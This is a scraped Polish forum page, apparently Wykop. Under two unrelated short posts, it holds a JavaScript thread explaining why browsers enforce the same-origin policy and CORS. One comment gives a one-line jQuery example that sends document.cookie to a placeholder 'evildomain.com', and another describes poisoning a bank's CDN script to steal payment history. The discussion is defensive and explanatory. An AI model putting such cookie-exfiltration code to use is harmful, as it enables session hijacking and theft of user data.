Aktywne Wpisy
Haerbin +3
Czy jeśli mój facet wali ciągle jakieś szowinistyczne żarty ( zaczął się do mnie dobierac jak sprzątałam w kuchni dosłownie miałam ręce w zlewie i powiedziałam żeby przestał bo sprzątam to powiedział że myslal że będę się swobodnie czuć w naturalnym środowisku) mimo że mówię że mi to przeszkadza to jest brak szacunku? Czy ja przesadzam i to tylko żart?
#zwiazki #pytanie
#zwiazki #pytanie
SzitpostForReal +175
NBP dzisiaj rano wypuścił propagandowy filmik, stworzony za nasze pieniądze, o tym jak dzielnie walczy z inflacją. Uwaga, nie zwracam za leczenie po obejrzeniu, oglądasz na własne ryzyko!
#gospodarka #ekonomia #finanse #nieruchomosci #polska #pieniadze #nbp
#gospodarka #ekonomia #finanse #nieruchomosci #polska #pieniadze #nbp
#javascript #webdev #pytanie
Może ktoś wyjaśni sytuację, w której to rzeczywiście cokolwiek chroni.
@ogur:
@Ginden: Jeśli tego również dotyczy SOP to nie, tego nie chcę ale to da się oddzielić akurat, gorzej jakbym używał twojego kodu wewnątrz swojej strony ale też nie o to mi chodzi tylko o plik JSON pobierany przez XHR.
@Marmite: CORS działa, jeśli serwer na to pozwala. ;( Czy
@look997: Taaaa? A co jeśli zrobiłbym coś takiego:
$.ajax('[http://evildomain.com/safefile.json?oopsThisIsPrettyUnsafe=](http://evildomain.com/safefile.json?oopsThisIsPrettyUnsafe=) '+encodeURIComponent(document.cookie))
Serwer zwraca JSON, ale przy okazji dostaje całe cookies w ścieżce. Sorry, SOP jest potrzebne. Wektorów ataku jest mnóstwo.
@look997: Jest. Wyobraź sobie, że bank ma swoją stronę na Angularze czy Emberze, a dane o rachunku są w pliku JSON.
@look997: Możesz odczytać dowolną informację ze strony i przesłać ją na dowolny serwer. Wyobraź sobie że włamuję się do popularnego CDN-a, z którego korzysta twój bank, i do pliku z frameworkiem doklejam bardzo króciutki fragment kodu, który uaktywnia się na stronie z historią płatności, odczytuje ją i wraz z twoimi danymi wysyła do mnie.
Muszę to na spokojnie zanalizować a wy powiedzcie ,czy tak się da?
@look997: Akurat XHR "bez cookies" są dość bezpiecznym pomysłem, tak przynajmniej mi się wydaje i myślę, że mogłyby zastąpić wiele JSONP.
@Marmite: Przykład z CDNem jest zły, bo wtedy możesz dodać kod przelewający złoto na Twoje konto. :P
Dodatkowe pytanie: Czy blokada następuje po stronie przeglądarki, bo jest sytuacja, gdzie używam CORS i taki skrypt i tak jest blokowany. W konsoli pisze, że trzeba skonfigurować odpowiednio serwer. Ale Czy to serwer coś blokuje, czy p prostu przeglądarka nie przyjmuje pliku z serwera, który nie zwraca jakiejś flagi czy czegoś?
Ale brzmi coś jak "w zapytaniach HTTP nie możesz wysyłać znaków ", ` i ', bo można je wykorzystać do SQL Injection".
Blokada jest po stronie przeglądarki.
Chodzi o to, żebyś po wejściu na stronę jakiegoś mirka nie pobrało Ci historii z banku.
Czyli bank ustawia CORS tylko na swoje domeny. Mirek napisał skrypt, który próbuje pobrać dane z bank.pl/history
Przeglądarka DOSTAJE dane z banku, tylko że w nagłówku widzi "CORS: bank.pl, bank.com.pl" i nie daje dostępu do danych skryptowi Mirka.
Co ciekawsze - ta "technologia" (jakkolwiek to nazywać) nie